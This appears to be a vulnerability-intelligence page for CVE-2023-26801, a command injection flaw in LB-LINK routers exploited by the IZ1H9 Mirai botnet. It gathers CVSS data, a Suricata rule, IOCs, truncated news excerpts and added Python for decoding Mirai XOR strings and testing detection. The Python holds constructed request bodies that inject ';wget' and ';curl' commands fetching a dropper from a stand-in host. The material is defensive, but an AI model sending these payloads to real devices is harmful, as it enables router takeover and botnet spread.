CVE-2023-26801
Published 2023-03-26
Priority: P1 (85) · Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
In the wild: VulnCheck KEV · Exploited in the wild
EPSS: 69.66% (99.3rd percentile)
LB-LINK BL-AC1900_2.0 v1.0.1, LB-LINK BL-WR9000 v2.4.9, LB-LINK BL-X26 v1.2.5, and LB-LINK BL-LTE300 v1.0.8 were discovered to contain a command injection vulnerability via the mac, time1, and time2 parameters at /goform/set_LimitClient_cfg.
Affected
4 ranges (the CPE entries carry no version bounds and no fixed version; the firmware builds confirmed vulnerable are the ones named in the description above)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lb-link | bl-ac1900_firmware | — | — |
| lb-link | bl-lte300_firmware | — | — |
| lb-link | bl-wr9000_firmware | — | — |
| lb-link | bl-x26_firmware | — | — |
Detection & IOCs (extracted from sources)
suricata (ET OPEN sid 2048548 rev 3; the rule uses Suricata sticky buffers such as http.uri and http.request_body together with startswith and bsize, so it is Suricata syntax rather than a Snort rule)
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT LB-Link Command Injection Attempt (CVE-2023-26801)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:27; content:"/goform/set_LimitClient_cfg"; http.request_body; content:"time1="; startswith; fast_pattern; content:"&time2"; distance:0; content:"&mac="; distance:0; pcre:"/^[^&]*?(?:(wget|curl))/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-iz1h9; reference:cve,2023-26801; classtype:attempted-admin; sid:2048548; rev:3;)
bytes: XOR key 0xBAADF00D (Mirai-style table encryption XORs each byte with the four key bytes in turn, so the effective single-byte key is 0xBA ^ 0xAD ^ 0xF0 ^ 0x0D = 0xEA)
bytes: Telnet/SSH credentials XOR key 0x54
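Worked example, added here and not taken from IZ1H9, Unit 42 or any other source on this page: how a four-byte Mirai table key collapses to the single-byte XOR 0xEA noted above, how table entries and scanner credentials decode under it, and how the byte key can be recovered by brute force when a variant changes it. The encrypted sample strings are constructed for the example (plaintext XORed here with the stated keys), not extracted from a binary; the generalization to the stock Mirai key 0xDEADBEEF is mine.

```python
# Added example: Mirai-style table/credential string decoding. Not code from
# IZ1H9 or from any source quoted on this page; sample ciphertexts below are
# constructed by XORing plaintext with the stated keys.
from string import printable


def mirai_effective_key(table_key: int) -> int:
    """Mirai's toggle_obf() XORs every byte with k1, k2, k3 and k4 in turn
    (the four bytes of the 32-bit table key), so the whole routine collapses
    to a single-byte XOR with k1 ^ k2 ^ k3 ^ k4."""
    effective = 0
    for shift in (0, 8, 16, 24):
        effective ^= (table_key >> shift) & 0xFF
    return effective


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; it is its own inverse, so it both encodes and decodes."""
    return bytes(b ^ key for b in data)


def decode_table_entry(blob: bytes, table_key: int) -> str:
    """Decode one table entry and drop the NUL terminator Mirai stores inside."""
    plain = xor_bytes(blob, mirai_effective_key(table_key))
    return plain.split(b"\x00", 1)[0].decode("latin-1")


def decode_credential(blob: bytes, cred_key: int = 0x54) -> str:
    """Scanner credentials use a separate single-byte key (0x54 per the IOC above)."""
    return xor_bytes(blob, cred_key).decode("latin-1")


def recover_key_candidates(blobs, allowed=frozenset(printable.encode())) -> list:
    """Brute-force the byte key: keep every key under which all sample blobs
    decode to printable ASCII (up to the first NUL). Useful when a variant has
    changed the four-byte key and only ciphertext is at hand."""
    candidates = []
    for key in range(256):
        ok = True
        for blob in blobs:
            plain = xor_bytes(blob, key).split(b"\x00", 1)[0]
            if not plain or any(c not in allowed for c in plain):
                ok = False
                break
        if ok:
            candidates.append(key)
    return candidates


# Constructed samples: table strings XORed with 0xEA (the IZ1H9 IOC key) and
# credentials XORed with 0x54. Values are illustrative, not real C2 data.
SAMPLE_TABLE = {
    "cnc_domain": xor_bytes(b"cnc.example.invalid\x00", 0xEA),
    "user_agent": xor_bytes(b"Mozilla/5.0\x00", 0xEA),
}
SAMPLE_CREDS = [xor_bytes(b"root", 0x54), xor_bytes(b"xc3511", 0x54)]


def decode_all(table_key: int = 0xBAADF00D) -> dict:
    """Decode every constructed table entry under the given 32-bit key."""
    return {name: decode_table_entry(blob, table_key) for name, blob in SAMPLE_TABLE.items()}


if __name__ == "__main__":
    print(hex(mirai_effective_key(0xBAADF00D)))   # 0xea
    print(decode_all())
    print([decode_credential(c) for c in SAMPLE_CREDS])
    print(recover_key_candidates(SAMPLE_TABLE.values()))
```

Because the four XORs commute, a sample that looks "custom-keyed" is still a single-byte XOR; the brute-force helper will list every byte that yields printable output, and the true key is the one under which all strings read as plausible domains, paths and credentials.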
- Exploit traffic targets HTTP POST to /goform/set_LimitClient_cfg with parameters time1, time2, and mac; the payload carries wget or curl commands to download the dropper (the rule's body regex is /^[^&]*?(?:(wget|curl))/R).
- The URI of the exploit request is exactly 27 bytes (/goform/set_LimitClient_cfg); bsize:27 on the URI buffer reduces false positives.
- Threat Prevention signatures 93386, 93718, 93721, 93722 cover the exploit and the malware activity associated with this campaign.
- The botnet uses custom UPX packing with unique signatures; standard UPX detection may miss samples, so look for UPX headers with non-standard magic bytes.
- The Tenda exploit function in this IZ1H9 sample contains a bug: it downloads tenda.sh but executes netlog.sh, so that particular exploit chain does not work as intended.
- The reported hash artifact (692a5d099e37cd94923ea2) appears truncated in the source document and may be incomplete; verify against the full hash before using it for detection.
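As an added example that is not part of the ET rule, the Unit 42 write-up or any other source on this page, the following Python re-implements the matching logic of ET sid 2048548 against constructed requests and sets it beside an order-independent check. It shows why the rule's positional body matching (startswith on time1=, then &time2, then &mac=, with the pcre anchored after &mac=) misses an injection placed in time1 or time2, a reordered parameter list, or a percent-encoded wget, while a check that decodes and inspects all three sink parameters catches them. The requests and the example.invalid dropper URL are constructed; the simplified matcher takes the first occurrence of each content keyword and does not reproduce Suricata's retry of later occurrences.

```python
# Added example: Python mirror of ET OPEN sid 2048548 (CVE-2023-26801) beside
# an order-independent detector. Not code from the ET ruleset, Unit 42 or any
# other source on this page; all requests below are constructed samples.
import re
from dataclasses import dataclass
from urllib.parse import unquote_plus

TARGET_URI = "/goform/set_LimitClient_cfg"     # 27 bytes, hence bsize:27 in the rule
SINK_PARAMS = ("mac", "time1", "time2")         # the three injectable parameters
# Characters that never belong in a MAC address or an HH:MM value.
SHELL_META = re.compile(r"[;|`$<>\n]")
DOWNLOADER = re.compile(r"\b(?:wget|curl|tftp|busybox)\b")


@dataclass(frozen=True)
class HttpRequest:
    method: str
    uri: str
    body: str          # raw, still percent-encoded, as Suricata sees it


def matches_et_2048548(req: HttpRequest) -> bool:
    """Positional logic of the ET rule: POST, URI exactly 27 bytes containing
    the path, body starting with 'time1=', then '&time2', then '&mac=', and
    the pcre /^[^&]*?(?:wget|curl)/R run from the end of '&mac='.
    Simplification: each content keyword is taken at its first occurrence."""
    if req.method != "POST":
        return False
    if len(req.uri) != 27 or TARGET_URI not in req.uri:
        return False
    body = req.body
    if not body.startswith("time1="):                        # startswith
        return False
    t2 = body.find("&time2", len("time1="))                  # distance:0
    if t2 < 0:
        return False
    mac = body.find("&mac=", t2 + len("&time2"))             # distance:0
    if mac < 0:
        return False
    tail = body[mac + len("&mac="):]
    return re.match(r"[^&]*?(?:wget|curl)", tail) is not None   # pcre .../R


def form_params(body: str) -> dict:
    """Split a form body on '&' only (older urllib.parse.parse_qs also split
    on ';', which would swallow an injected ';wget') and percent-decode."""
    params: dict = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def detect_limitclient_injection(req: HttpRequest) -> dict:
    """Order-independent check over all three sinks after decoding."""
    if req.method != "POST" or req.uri.split("?", 1)[0] != TARGET_URI:
        return {}
    params = form_params(req.body)
    hits = {}
    for name in SINK_PARAMS:
        for value in params.get(name, []):
            if SHELL_META.search(value) or DOWNLOADER.search(value):
                hits[name] = value
    return hits


DROPPER = "http://example.invalid/x.sh"   # constructed, not a real IZ1H9 URL
SAMPLES = {
    "benign":    HttpRequest("POST", TARGET_URI, "time1=08:00&time2=17:00&mac=00:11:22:33:44:55"),
    "inj_mac":   HttpRequest("POST", TARGET_URI, f"time1=00:00&time2=23:59&mac=00:11:22:33:44:55;wget+{DROPPER}"),
    "inj_time1": HttpRequest("POST", TARGET_URI, f"time1=00:00;curl+{DROPPER}&time2=23:59&mac=00:11:22:33:44:55"),
    "reordered": HttpRequest("POST", TARGET_URI, f"mac=00:11:22:33:44:55;wget+{DROPPER}&time1=00:00&time2=23:59"),
    "encoded":   HttpRequest("POST", TARGET_URI, f"time1=00:00&time2=23:59&mac=00:11:22:33:44:55%3B%77get+{DROPPER}"),
}


def evaluate() -> dict:
    """Map sample name -> (ET rule fires?, sink parameters flagged by the decoding check)."""
    return {name: (matches_et_2048548(r), sorted(detect_limitclient_injection(r)))
            for name, r in SAMPLES.items()}


if __name__ == "__main__":
    for name, (et, flagged) in evaluate().items():
        print(f"{name:10} ET sid 2048548: {str(et):5}  sinks flagged: {flagged}")
```

Only the inj_mac sample trips the ET rule; the other three malicious bodies are caught solely by the decoding check. The ET rule is tuned for the IZ1H9 campaign's exact request shape, which is why it has few false positives, but anyone relying on it alone should pair it with a broader rule or WAF check on all three parameters.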
CVSS provenance
NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.8 CRITICAL
GHSA
GHSA-c5pj-m2vw-68wh: LB-LINK BL-AC1900_2 (ghsa_unreviewed · 2023-03-26 · CVE-2023-26801 · CRITICAL · CWE-77); description identical to the NVD text above.
VulnCheck
lb-link bl-lte300_firmware: Improper Neutralization of Special Elements used in a Command ('Command Injection') (vulncheck · 2023 · CVSS 9.8 · CRITICAL); description identical to the NVD text above.
Affected: lb-link bl-lte300_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://www.fortiguard.com/outbreak-alert/router-malware-attack
- https://unit42.paloaltonetworks.com/mirai-variant-iz1h9/
- https://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnet
- https:/ (remaining reference truncated in the source)
Suricata
ET EXPLOIT LB-Link Command Injection Attempt (CVE-2023-26801) (suricata · 2023-10-12 · CVSS 9.8 · CRITICAL)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT LB-Link Command Injection Attempt (CVE-2023-26801)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:27; content:"/goform/set_LimitClient_cfg"; http.request_body; content:"time1="; startswith; fast_pattern; content:"&time2"; distance:0; content:"&mac="; distance:0; pcre:"/^[^&]*?(?:(wget|curl))/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-iz1h9; reference:cve,2023-26801; classtype:attempted-admin; sid:2048548; rev:3; metadata:attack_target IoT, created_at 2023_10_12, cve CVE_2023_26801, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus
No public exploits indexed here; the researcher's disclosure repository (winmt/my-vuls) is linked at the end of this page.
SANS ISC
What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary] (blogs_sans_isc · tagged CVE-2016-20017 · published 2026-06-24, last updated 2026-06-25 00:39:08 UTC)
by Nicole Phillips, SANS.edu BACS Student (Version: 1)
[This is a Guest Diary by Nicole Phillips, an ISC intern as part of the SANS.edu BACS program]
"I was just sitting here enjoying the company. Plants got a lot to say, if you take the time to listen."
— Eeyore, Winnie the Pooh
Introduction: Listening to the Static
Setting up and contributing to the DShield honeypot project [1] as an ISC intern is a meaningful part of the BACS program at SANS [2]. Over the last several months I've been thrilled to observe real-time SSH/Telnet activity, check every new file hash and TTY log and hunt for unique http requests. That sa
Trend Micro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits (blogs_trendmicro · 2025-10-09 · CVSS 8.8 · HIGH · Cyber Threats)
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus, Oct 09, 2025
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022.
Januar
Trend Micro (same article, excerpt with key takeaways)
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits (blogs_trendmicro · 2025-10-09 · Cyber Threats)
Key takeaways
- The campaign exposes organizations with exposed infrastructure to data exfiltration, persistent network compromise, and operational disruption.
- Organizations operating internet-facing network devices are at heightened risk. Active exploitation has been observed globally since mid-2025, with several CVEs now included in CISA's Known Exploited Vul
BleepingComputer
RondoDox botnet targets 56 n-day flaws in worldwide attacks (blogs_bleepingcomputer · 2025-10-09 · CVSS 8.8 · HIGH) · by Bill Toulas
A new large-scale botnet called RondoDox is targeting 56 vulnerabilities in more than 30 distinct devices, including flaws first disclosed during Pwn2Own hacking competitions.
The attackers focus on a wide range of exposed devices, including DVRs, NVRs, CCTV systems, and web servers, and have been active since June.
The RondoDox botnet leverages what Trend Micro researchers call an "exploit shotgun" strategy, where numerous exploits are used simultaneously to maximize infections, even if the activity is very noisy.
Since FortiGuard Labs discovered RondoDox, the botnet appears to have expanded the list of exploited vulnerabilities, which included CVE-2024-3721 and CVE-2024-12856.
## Mass n-day exploitat
BleepingComputer
New Aquabotv3 botnet malware targets Mitel command injection flaw (blogs_bleepingcomputer · 2025-01-29 · CVE-2024-41710 · CVSS 7.2 · HIGH) · by Bill Toulas
A new variant of the Mirai-based botnet malware Aquabot has been observed actively exploiting CVE-2024-41710, a command injection vulnerability in Mitel SIP phones.
The activity was discovered by Akamai's Security Intelligence and Response Team (SIRT), which reports that this is the third variant of Aquabot to come under its radar.
The malware family was introduced in 2023, and a second version that added persistence mechanisms was released later. The third variant, 'Aquabotv3,' introduced a system that detects termination signals and sends the info to the command-and-control (C2) server.
Akamai comments that Aquabotv3's mechanism to report back kill attempts is unusual for botnets and may have been
BleepingComputer
New Mirai botnet targets industrial routers with zero-day exploits (blogs_bleepingcomputer · 2025-01-07 · CVE-2024-12856 · CVSS 8.8 · HIGH) · by Bill Toulas
A relatively new Mirai-based botnet has been growing in sophistication and is now leveraging zero-day exploits for security flaws in industrial routers and smart home devices.
Exploitation of previously unknown vulnerabilities started in November 2024, according to Chainxin X Lab researchers who monitored the botnet's development and attacks.
One of the security issues is CVE-2024-12856, a vulnerability in Four-Faith industrial routers that VulnCheck discovered in late December but noticed efforts to exploit around December 20.
The botnet has been leveraging a zero-day exploit for CVE-2024-12856, impacting Four-Faith routers, alongside other custom exploits for flaws in Neterbit
Unit 42
Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices (blogs_unit42 · 2023-05-25 · CVE-2023-26801 · CVSS 9.8 · CRITICAL)
Chao Lei, Zhibin Zhang, Cecilia Hu · Published: May 25, 2023
Tags: CVE-2023-26801, CVE-2023-26802, CVE-2023-27076, IoT, IZ1H9, Mirai variant
## Executive Summary
On April 10, Unit 42 researchers observed a Mirai variant called IZ1H9, which used several vulnerabilities to spread itself. The threat actors use the following vulnerabilities to target exposed servers and networking devices running Linux:
- CVE-2023-27076: Tenda G103 command injection vulnerability
- CVE-2023-26801: LB-Link command injection vulnerability
- CVE-2023-26802: DCN DCBI-Netlog-LAB remote code execution vulnerability
- Zyxel remote code execution vulnerabilit
Unit 42 (same article, second excerpt tagged CVE-2023-27076)
Compromised devices can be fully controlled by attackers and become a part of the botnet. Those devices can be used to conduct further attacks, such as distributed denial-of-service (DDoS) attacks.
Palo Alto Networks Next Generation Firewall customers receive protections through Cloud-Delivered S
References
- https://github.com/winmt/my-vuls/tree/main/LB-LINK%20BL-AC1900%2C%20BL-WR9000%2C%20BL-X26%20and%20BL-LTE300%20Wireless%20Routers (researcher's my-vuls disclosure repository)
- https://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnet